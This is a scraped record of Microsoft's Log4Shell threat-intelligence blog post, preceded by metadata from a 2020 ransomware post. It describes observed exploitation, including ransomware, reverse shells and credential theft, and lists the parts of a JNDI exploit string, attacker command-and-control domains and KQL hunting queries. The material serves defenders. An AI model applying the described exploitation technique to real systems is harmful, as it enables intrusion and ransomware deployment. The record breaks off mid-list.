"title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "modified": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T21:27:16", "description": "**_January 10, 2022 recap \u2013_**_ The Log4j vulnerabilities represent a complex and high-risk situation for companies across the globe. This open-source component is widely used across many suppliers\u2019 software and services. By nature of Log4j being a component, the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications, so customers may not readily know how widespread the issue is in their environment. Customers are encouraged to utilize scripts and scanning tools to assess their risk and impact. Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. 
There is high potential for the expanded use of the vulnerabilities._\n\n_In January, we started seeing attackers taking advantage of the vulnerabilities in internet-facing systems, eventually deploying ransomware._ _We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised. Microsoft recommends customers to do additional review of devices where vulnerable installations are discovered. At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance._\n\n_**January 19, 2022 update** - We added new information about an unrelated vulnerability we discovered while investigating Log4j attacks._\n\nThe remote code execution (RCE) vulnerabilities in Apache Log4j 2 referred to as \u201cLog4Shell\u201d ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44832>)) has presented a new attack vector and gained broad attention due to its severity and potential for widespread exploitation. 
The majority of attacks we have observed so far have been mainly mass-scanning, coin mining, establishing remote shells, and red-team activity, but it\u2019s highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits.\n\nWith nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>) for technical information about the vulnerabilities and mitigation recommendations.\n\nMeanwhile, defenders need to be diligent in detecting, hunting for, and investigating related threats. This blog reports our observations and analysis of attacks that take advantage of the Log4j 2 vulnerabilities. It also provides our recommendations for using Microsoft security solutions to (1) find and remediate vulnerable services and systems and (2) detect, investigate, and respond to attacks.\n\nThis blog covers the following topics:\n\n 1. **Attack vectors and observed activity**\n 2. **Finding and remediating vulnerable apps and systems**\n * Threat and vulnerability management\n * Discovering affected components, software, and devices via a unified Log4j dashboard\n * Applying mitigation directly in the Microsoft 365 Defender portal\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for servers\n * Microsoft Defender for Containers\n * Microsoft Sentinel queries\n * RiskIQ EASM and Threat Intelligence\n 3. 
**Detecting and responding to exploitation attempts and other related attacker activity**\n * Microsoft 365 Defender\n * Microsoft Defender Antivirus\n * Microsoft Defender for Endpoint\n * Microsoft Defender for Cloud Apps\n * Microsoft Defender for Office 365\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for IoT\n * Microsoft Sentinel\n * Microsoft Sentinel queries\n * Azure Firewall Premium\n * Azure Web Application Firewall (WAF)\n 4. **Indicators of compromise (IoCs)**\n\n## Attack vectors and observed activity\n\nMicrosoft\u2019s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of the remote code execution (RCE) vulnerabilities in [Apache Log4j 2](<https://logging.apache.org/log4j/2.x/>) referred to as \u201cLog4Shell\u201d.\n\nThe bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern of attack would appear in a web request log with strings like the following:\n\n\n\nAn attacker performs an HTTP request against a target system, which generates a log using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.\n\nThe specially crafted string that enables exploitation of the vulnerabilities can be identified through several components. The string contains \u201cjndi\u201d, which refers to the Java Naming and Directory Interface. 
Following this, the protocol, such as \u201cldap\u201d, \u201cldaps\u201d, \u201crmi\u201d, \u201cdns\u201d, \u201ciiop\u201d, or \u201chttp\u201d, precedes the attacker domain.\n\nAs security teams work to detect the exploitation, attackers have added obfuscation to these requests to evade detections based on request patterns. We\u2019ve seen things like running a lower or upper command within the exploitation string and even more complicated obfuscation attempts, such as the following, that are all trying to bypass string-matching detections:\n\n\n\nThe vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerabilities, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, using Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.\n\n### Exploitation continues on non-Microsoft hosted Minecraft servers\n\nMinecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users. More information can be found here: <https://aka.ms/mclog>.\n\nMicrosoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by [Bitdefender](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). 
In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader.\n\nIn these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients. We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of _javaw.exe_ to ransom the device.\n\nWhile it\u2019s uncommon for Minecraft to be installed in enterprise networks, we have also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, giving an actor full access to a compromised system, which they then use to run Mimikatz to steal credentials. These techniques are typically associated with enterprise compromises with the intent of lateral movement. Microsoft has not observed any follow-on activity from this campaign at this time, indicating that the attacker may be gathering access for later use.\n\nDue to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.\n\n### Nation-state activity\n\nMSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. 
This activity ranges from experimentation during development, integration of the vulnerabilities to in-the-wild payload deployment, and exploitation against targets to achieve the actor\u2019s objectives.\n\nFor example, MSTIC has observed PHOSPHORUS, an Iranian actor known to deploy ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications.\n\nIn addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.\n\n### Access brokers associated with ransomware\n\nMSTIC and the Microsoft 365 Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.\n\n### Mass scanning activity continues\n\nThe vast majority of traffic observed by Microsoft remains mass scanners by both attackers and security researchers. Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. 
Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JNDI:ldap:// request to launch bash commands on Linux and PowerShell on Windows.\n\nMicrosoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.\n\n### Additional RAT payloads\n\nWe\u2019ve observed the dropping of additional remote access toolkits and reverse shells via exploitation of CVE-2021-44228, which actors then use for hands-on-keyboard attacks. In addition to the Cobalt Strike and PowerShell reverse shells seen in earlier reports, we\u2019ve also seen Meterpreter, Bladabindi, and HabitsRAT. Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally.\n\nThis activity is split between a percentage of small-scale campaigns that may be more targeted or related to testing, and the addition of CVE-2021-44428 to existing campaigns that were exploiting vulnerabilities to drop remote access tools. In the HabitsRAT case, the campaign was seen overlapping with infrastructure used in prior campaigns.\n\n### Webtoos\n\nThe Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities. As reported by [RiskIQ](<https://community.riskiq.com/article/67ba1386>), Microsoft has seen Webtoos being deployed via the vulnerability. 
Attackers\u2019 use of this malware or intent is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems prior to this vulnerability.\n\n### A note on testing services and assumed benign activity\n\nWhile services such as _interact.sh_, _canarytokens.org_, _burpsuite_, and _dnslog.cn_ may be used by IT organizations to profile their own threat footprints, Microsoft encourages including these services in your hunting queries and validating observations of these in environments to ensure they are intentional and legitimate activity.\n\n### Exploitation in internet-facing systems leads to ransomware\n\nAs early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.\n\nThese attacks are performed by a China-based ransomware operator that we\u2019re tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).\n\nBased on our analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.\n\n### Attackers propagating Log4j attacks via previously undisclosed vulnerability\n\nDuring our sustained monitoring of threats taking advantage of the Log4j 2 vulnerabilities, we observed activity related to attacks being propagated via a previously undisclosed vulnerability in the SolarWinds Serv-U software. 
We discovered that the vulnerability, now tracked as [CVE-2021-35247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35247>), is an input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.\n\nWe reported our discovery to SolarWinds, and we\u2019d like to thank their teams for immediately investigating and working to remediate the vulnerability. We strongly recommend that affected customers apply the released security updates by referring to the SolarWinds advisory here: <https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>. \n\nMicrosoft customers can use threat and vulnerability management in Microsoft Defender for Endpoint to identify and remediate devices that have this vulnerability. In addition, Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect malicious behavior related to the observed activity.\n\n## Finding and remediating vulnerable apps and systems\n\n### Threat and vulnerability management\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in Microsoft Defender for Endpoint monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities.\n\n#### Discovering affected components, software, and devices via a unified Log4j dashboard\n\nThreat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment and significantly reduces time-to-mitigate.\n\nThe wide use of Log4j across many suppliers\u2019 products challenges defender teams to mitigate and address the risks posed by the vulnerabilities 
([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) or [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)). The threat and vulnerability management capabilities within Microsoft 365 Defender can help identify vulnerable installations. On December 15, we began rolling out updates to provide a consolidated view of the organizational exposure to the Log4j 2 vulnerabilities\u2014on the device, software, and vulnerable component level\u2014through a range of automated, complementing capabilities. These capabilities are supported on Windows 10, Windows 11, and Windows Server 2008, 2012, and 2016. They are also supported on Linux, but they require updating the Microsoft Defender for Endpoint Linux client to version 101.52.57 (30.121092.15257.0) or later. The updates include the following:\n\n * Discovery of vulnerable Log4j library components (paths) on devices\n * Discovery of vulnerable installed applications that contain the Log4j library on devices\n * A [dedicated Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>) that provides a consolidated view of various findings across vulnerable devices, vulnerable software, and vulnerable files\n * Introduction of a new schema in advanced hunting, **DeviceTvmSoftwareEvidenceBeta**, which surfaces file-level findings from the disk and provides the ability to correlate them with additional context in advanced hunting:\n \n \n DeviceTvmSoftwareEvidenceBeta\n | mv-expand DiskPaths\n | where DiskPaths contains \"log4j\"\n | project DeviceId, SoftwareName, SoftwareVendor, SoftwareVersion, DiskPaths\n\nTo complement this new table, the existing **DeviceTvmSoftwareVulnerabilities** table in advanced hunting can be used to identify vulnerabilities in installed software on devices:\n \n \n DeviceTvmSoftwareVulnerabilities \n | where CveId in (\"CVE-2021-44228\", \"CVE-2021-45046\")\n\nThese new capabilities integrate with 
the existing threat and vulnerability management experience and are gradually rolling out. As of December 27, 2021, discovery is based on installed application CPEs that are known to be vulnerable to Log4j RCE, as well as the presence of vulnerable Log4j Java Archive (JAR) files. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but support for discovery of these instances and other packaging methods is in development. Support for macOS is also in progress and will roll out soon.\n\n\n\n_Figure 1. Threat and Vulnerability recommendation __\u201cAttention required: Devices found with vulnerable Apache Log4j versions\u201d_\n\nOn the Microsoft 365 Defender portal, go to **Vulnerability management** > **Dashboard** > **Threat awareness**, then click **View vulnerability details** to see the consolidated view of organizational exposure to the Log4j 2 vulnerability (for example, CVE-2021-44228 dashboard, as shown in the following screenshots) on the device, software, and vulnerable component level.\n\n\n\n_Figure 2. Threat and vulnerability management dedicated CVE-2021-44228 dashboard_\n\n\n\n_Figure 3. Threat and vulnerability management finds exposed paths_\n\n\n\n_Figure 4. Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk_\n\nNote: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices. A regularly updated list of vulnerable products can be viewed in the Microsoft 365 Defender portal with matching recommendations. 
We will continue to review and update this list as new information becomes available.\n\nThrough [device discovery](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/unmanaged-device-protection-capabilities-are-now-generally/ba-p/2463796>), unmanaged devices with products and services affected by the vulnerabilities are also surfaced so they can be onboarded and secured.\n\n\n\n_Figure 5. Finding vulnerable applications and devices via software inventory_\n\n#### Applying mitigation directly in the Microsoft 365 Defender portal\n\nWe have released two new threat and vulnerability management capabilities that can significantly simplify the process of turning off JNDI lookup, a workaround that can prevent the exploitation of the Log4j vulnerabilities on most devices, using an environment variable called LOG4J_FORMAT_MSG_NO_LOOKUPS. These new capabilities provide security teams with the following:\n\n 1. View the mitigation status for each affected device. This can help prioritize mitigation and/or patching of devices based on their mitigation status.\n\nTo use this feature, open the [Exposed devices tab](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/exposedDevices>) in the dedicated CVE-2021-44228 dashboard and review the **Mitigation status** column. Note that it may take a few hours for the updated mitigation status of a device to be reflected.\n\n\n\n_Figure 6. Viewing each device\u2019s mitigation status_\n\n 2. Apply the mitigation (that is, turn off JNDI lookup) on devices directly from the portal. This feature is currently available for Windows devices only.\n\nThe mitigation will be applied directly via the Microsoft Defender for Endpoint client. 
To view the mitigation options, click on the **Mitigation options** button in the [Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>):\n\n\n\nYou can choose to apply the mitigation to all exposed devices or select specific devices for which you would like to apply it. To complete the process and apply the mitigation on devices, click **Create mitigation action**.\n\n\n\n_Figure 7. Creating mitigation actions for exposed devices._\n\nIn cases where the mitigation needs to be reverted, follow these steps:\n\n 1. Open an elevated PowerShell window\n 2. Run the following command:\n \n \n [Environment]::SetEnvironmentVariable(\"LOG4J_FORMAT_MSG_NO_LOOKUPS\", $null, [EnvironmentVariableTarget]::Machine)\n\nThe change will take effect after the device restarts.\n\n### Microsoft 365 Defender advanced hunting\n\nAdvanced hunting can also surface affected software. This query looks for possibly vulnerable applications using the affected Log4j component. Triage the results to determine applications and programs that may need to be patched and updated.\n \n \n DeviceTvmSoftwareInventory\n | where SoftwareName contains \"log4j\"\n | project DeviceName, SoftwareName, SoftwareVersion\n\n\n\n_Figure 8. Finding vulnerable software via advanced hunting_\n\n### Microsoft Defender for Cloud\n\n#### Microsoft Defender for servers\n\nOrganizations using Microsoft Defender for Cloud can use [Inventory tools](<https://docs.microsoft.com/azure/defender-for-cloud/asset-inventory>) to begin investigations before there\u2019s a CVE number. 
With Inventory tools, there are two ways to determine exposure across hybrid and multi-cloud resources:\n\n * Vulnerability assessment findings \u2013 Organizations who have enabled any of the vulnerability assessment tools (whether it's Microsoft Defender for Endpoint's [threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) module, the [built-in Qualys scanner](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-vm>), or a [bring your own license solution](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-byol-vm>)), they can search by CVE identifier:\n\n\n\n_Figure 9. Searching vulnerability assessment findings by CVE identifier_\n\n * Software inventory - With the combined [integration with Microsoft Defender for Endpoint](<https://docs.microsoft.com/azure/defender-for-cloud/integration-defender-for-endpoint>) and [Microsoft Defender for servers](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-servers-introduction>), organizations can search for resources by installed applications and discover resources running the vulnerable software:\n\n\n\n_Figure 10. Searching software inventory by installed applications_\n\nNote that this doesn\u2019t replace a search of your codebase. It\u2019s possible that software with integrated Log4j libraries won\u2019t appear in this list, but this is helpful in the initial triage of investigations related to this incident. 
For more information about how Microsoft Defender for Cloud finds machines affected by CVE-2021-44228, read this [tech community post](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/how-defender-for-cloud-finds-machines-affected-by-log4j/ba-p/3037271>).\n\n#### Microsoft Defender for Containers\n\nMicrosoft Defender for Containers is capable of discovering images affected by the vulnerabilities recently discovered in Log4j 2: [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), and [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>). Images are automatically scanned for vulnerabilities in three different use cases: when pushed to an Azure container registry, when pulled from an Azure container registry, and when container images are running on a Kubernetes cluster. Additional information on supported scan triggers and Kubernetes clusters can be found [here](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-containers-introduction?tabs=defender-for-container-arch-aks>). \n\nLog4j binaries are discovered whether they are deployed via a package manager, copied to the image as stand-alone binaries, or included within a JAR Archive (up to one level of nesting). \n\nWe will continue to follow up on any additional developments and will update our detection capabilities if any additional vulnerabilities are reported.\n\n**Finding affected images**\n\nTo find vulnerable images across registries using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Container Registry images should have vulnerability findings resolved** recommendation and search findings for the relevant CVEs. \n\n\n\n_Figure 11. 
Finding images with the CVE-2021-45046 vulnerability_ \n\n**Find vulnerable running images on Azure portal [preview] **\n\nTo view only vulnerable images that are currently running on a Kubernetes cluster using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Vulnerabilities in running container images should be remediated (powered by Qualys)** recommendation and search findings for the relevant CVEs: \n\n\n\n_Figure 12. Finding running images with the CVE-2021-45046 vulnerability _\n\nNote: This recommendation requires clusters to run Microsoft Defender security profile to provide visibility on running images.\n\n**Search Azure Resource Graph data ******\n\nAzure Resource Graph (ARG) provides instant access to resource information across cloud environments with robust filtering, grouping, and sorting capabilities. It's a quick and efficient way to query information across Azure subscriptions programmatically or from within the Azure portal. ARG provides another way to query resource data for resources found to be affected by the Log4j vulnerability.\n\nThe following query finds resources affected by the Log4j vulnerability across subscriptions. 
Use the additional data field across all returned results to obtain details on vulnerable resources: \n \n \n securityresources \n | where type =~ \"microsoft.security/assessments/subassessments\"\n | extend assessmentKey=extract(@\"(?i)providers/Microsoft.Security/assessments/([^/]*)\", 1, id), subAssessmentId=tostring(properties.id), parentResourceId= extract(\"(.+)/providers/Microsoft.Security\", 1, id)\n | extend Props = parse_json(properties)\n | extend additionalData = Props.additionalData\n | extend cves = additionalData.cve\n | where isnotempty(cves) and array_length(cves) > 0\n | mv-expand cves\n | where tostring(cves) has \"CVE-2021-44228\" or tostring(cves) has \"CVE-2021-45046\" or tostring(cves) has \"CVE-2021-45105\" \n\n### Microsoft Sentinel queries\n\nMicrosoft Sentinel customers can use the following detection query to look for devices that have applications with the vulnerability:\n\n * [Vulnerable machines related to Log4j CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityNestedRecommendation/Log4jVulnerableMachines.yaml>)\n\nThis query uses the Microsoft Defender for Cloud nested recommendations data to find machines vulnerable to Log4j CVE-2021-44228.\n\nMicrosoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: <https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell>\n\n### RiskIQ EASM and Threat Intelligence\n\nRiskIQ has published a few threat intelligence articles on this CVE, with mitigation guidance and IOCs. The latest one with links to previous articles can be found [here](<https://community.riskiq.com/article/67ba1386>). Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet. 
For example, it's possible to [surface all observed instances of Apache](<https://community.riskiq.com/search/components?category=Server&query=Apache>) or [Java](<https://community.riskiq.com/research?query=java>), including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you. \n\nFor a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note, you must be registered with a corporate email and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the [Attack Surface Intelligence Dashboard](<https://app.riskiq.net/a/main/index#/dashboards/379/RiskIQ%20Attack%20Intelligence%20Dashboard>) Log4J Insights tab. \n\n## Detecting and responding to exploitation attempts and other related attacker activity\n\n### Microsoft 365 Defender\n\nMicrosoft 365 Defender coordinates multiple security solutions that detect components of observed attacks taking advantage of this vulnerability, from exploitation attempts to remote code execution and post-exploitation activity.\n\n\n\n_Figure 13. Microsoft 365 Defender solutions protect against related threats_\n\nCustomers can click **Need help?** in the Microsoft 365 Defender portal to open up a search widget. Customers can key in \u201cLog4j\u201d to search for in-portal resource, check if their network is affected, and work on corresponding actionable items to mitigate them.\n\n#### Microsoft Defender Antivirus\n\nTurn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants. 
Microsoft Defender Antivirus detects components and behaviors related to this threat as the following detection names:\n\nOn Windows:\n\n * [Trojan:Win32/Capfetox.AA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Capfetox.AA&threatId=-2147159827>) - detects attempted exploitation on the attacker machine\n * [HackTool:Win32/Capfetox.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool:Win32/Capfetox.A!dha&threatId=-2147159807>) - detects attempted exploitation on the attacker machine\n * [VirTool:Win64/CobaltStrike.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:Win64/CobaltStrike.A&threatId=-2147200161>), [TrojanDropper:PowerShell/Cobacis.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDropper:PowerShell/Cobacis.A&threatId=-2147200375>) - detects Cobalt Strike Beacon loaders\n * [TrojanDownloader:Win32/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Win32/CoinMiner&threatId=-2147257370>) - detects post-exploitation coin miner\n * [Trojan:Win32/WebToos.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebToos.A&threatId=-2147278986>) - detects post-exploitation PowerShell\n * [Ransom:MSIL/Khonsari.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:MSIL/Khonsari.A&threatId=-2147159485>) - detects a strain of the Khonsari ransomware family observed being distributed post-exploitation\n * [Trojan:Win64/DisguisedXMRigMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/DisguisedXMRigMiner&threatId=-2147169351>) - detects post-exploitation cryptocurrency miner\n * 
[TrojanDownloader:Java/Agent.S](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Java/Agent.S&threatId=-2147159796>) - detects suspicious class files used in post-exploitation\n * [TrojanDownloader:PowerShell/NitSky.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:PowerShell/NitSky.A&threatId=-2147157401>) - detects attempts to download CobaltStrike Beacon payload\n\nOn Linux:\n\n * [Trojan:Linux/SuspectJavaExploit.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.A&threatId=-2147159829>), [Trojan:Linux/SuspectJavaExploit.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.B&threatId=-2147159828>), [Trojan:Linux/SuspectJavaExploit.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.C&threatId=-2147159808>) - blocks Java processes downloading and executing payload through output redirection\n * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Linux/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/CoinMiner&threatId=-2147241315>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Linux/Tusnami](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Tusnami.A&threatId=-2147159794>) - detects post-exploitation Backdoor Tsunami downloader\n * [Backdoor:Linux/Tusnami.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Tusnami.C!MTB&threatId=-2147178887>) - detects post-exploitation Tsunami backdoor\n * 
[Backdoor:Linux/Setag.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Setag.C&threatId=-2147277056>) - detects post-exploitation Gates backdoor\n * [Exploit:Linux/CVE-2021-44228.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.A&threatId=-2147159804>), [Exploit:Linux/CVE-2021-44228.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.B&threatId=-2147159803>) - detects exploitation\n * [TrojanDownloader:Linux/Capfetox.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.A&threatId=-2147159639>), [TrojanDownloader:Linux/Capfetox.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.B&threatId=-2147159640>)\n * [TrojanDownloader:Linux/ShAgnt!MSR](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt!MSR&threatId=-2147159432>), [TrojanDownloader:Linux/ShAgnt.A!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt.A!MTB&threatId=-2147159607>)\n * [Trojan:Linux/Kinsing.L](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Kinsing.L&threatId=-2147189973>) - detects post-exploitation cryptocurrency Kinsing miner\n * 